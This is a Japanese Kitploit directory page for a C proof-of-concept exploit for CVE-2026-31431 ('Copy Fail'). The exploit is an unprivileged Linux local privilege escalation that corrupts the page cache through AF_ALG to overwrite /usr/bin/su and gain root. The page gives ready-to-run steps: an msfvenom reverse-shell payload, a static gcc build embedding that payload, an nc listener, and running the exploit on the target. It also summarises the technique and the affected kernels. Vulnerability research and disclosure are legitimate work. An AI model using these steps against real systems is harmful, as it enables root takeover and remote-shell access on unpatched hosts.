Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-31431 — CVE-2026-31431 の C PoC。特権のない Linux LPE で、AF_ALG のページキャッシュ破損を悪用して /usr/bin/su を上書きし、root を取得します。 | Kitploit
ツール/GitHubGitHub/mcub3/cve-2026-31431
特権昇格エクスプロイトフレームワーク脆弱性分析エクスプロイトペイロード開発バイナリエクスプロイト
GitHubmcub3/cve-2026-31431

CVE-2026-31431

CVE-2026-31431 の C PoC。特権のない Linux LPE で、AF_ALG のページキャッシュ破損を悪用して /usr/bin/su を上書きし、root を取得します。

リポジトリを見る
3ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-31431(Copy Fail)— C PoC

AF_ALG のロジックバグ(カーネル 4.14 → 2026年初頭)を利用して、任意の読み取り可能なファイルのページキャッシュに制御された4バイトを書き込むことで実現する、特権を必要としない単純なLPE。

メモリ内の /usr/bin/su を破壊してから実行する → root 取得。

Exploitスクリーンショット

ビルドと実行

root@kitploit:~
# 1. ELFペイロードを生成(リバースシェルの例)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. コンパイル(静的、ストリップ、ペイロードは .incbin で埋め込み)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. 先にリスナーを起動(nc -lvp <LPORT>)、その後ターゲットホストでエクスプロイトを実行
./copy_fail_x86

主要な詳細

• CVE: CVE-2026-31431 • CVSS: 7.8 • 修正: コミット a664bf3d603d

• 2017年〜2026年のほぼすべてのLinuxディストリビューションで動作(コンテナ含む)。

• 手法: /usr/bin/su を O_RDONLY で開き、AEADのインプレース復号を悪用して細工したペイロードをVFSを迂回してページキャッシュに直接スプライスする。

• 元の開示情報と732バイトのPython PoC → https://copy.fail

ライセンス

MIT — LICENSE を参照。 教育目的・許可されたテストのみを対象としています。自己責任で使用してください。

ツールをダウンロード